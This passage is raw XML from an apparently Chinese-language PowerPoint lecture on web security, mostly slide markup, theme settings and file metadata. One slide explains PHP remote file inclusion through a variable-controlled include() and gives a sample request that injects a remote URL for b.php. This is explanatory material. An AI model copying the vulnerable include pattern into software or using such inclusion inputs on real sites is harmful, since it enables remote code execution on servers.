              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:include($b."/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>aaa.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>".)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，这对黑客来说，可以通过变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来实现远程攻击，可以是黑客自已的代码，用来实现对网站的攻击。可以向服务器提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>a.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> include=http://127.0.0. 1/b.php,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>然后执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>b.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的指令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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AUTOCOLOR" val="FALSE"/>
  <p:tag name="MH_TYPE" val="CONTENTS"/>
  <p:tag name="ID" val="553532"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.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11.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12.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AUTOCOLOR" val="FALSE"/>
  <p:tag name="MH_TYPE" val="CONTENTS"/>
  <p:tag name="ID" val="553532"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.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14.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16.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18.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2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.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2.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20.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2"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.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22.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3.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5.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7.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ENTRY"/>
  <p:tag name="ID" val="553532"/>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OTHERS"/>
  <p:tag name="ID" val="553532"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="MH" val="20160324101725"/>
  <p:tag name="MH_LIBRARY" val="CONTENTS"/>
  <p:tag name="MH_TYPE" val="NUMBER"/>
  <p:tag name="ID" val="553532"/>
  <p:tag name="MH_ORDER" val="2"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office 主题">
  <a:themeElements>
    <a:clrScheme name="自定义 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="5E5E5E"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DDDDDD"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="306786"/>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lang="zh-CN" altLang="en-US"/>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A000120140530A47KPBG</Template>
  <TotalTime>0</TotalTime>
  <Words>2098</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>210</Paragraphs>
  <Slides>43</Slides>
  <Notes>1</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>12</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>43</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="60" baseType="lpstr">
      <vt:lpstr>冬青黑体简体中文 W3</vt:lpstr>
      <vt:lpstr>冬青黑体简体中文 W6</vt:lpstr>
      <vt:lpstr>华文细黑</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Tempus Sans ITC</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>自定义设计方案</vt:lpstr>
      <vt:lpstr>01.Business Plan Full Coulour</vt:lpstr>
      <vt:lpstr>1_自定义设计方案</vt:lpstr>
      <vt:lpstr>2_01.Business Plan Full Coulour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TonySong</dc:creator>
  <cp:lastModifiedBy>刘士龙</cp:lastModifiedBy>
  <cp:revision>1867</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-07-07T13:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-22T22:34:55Z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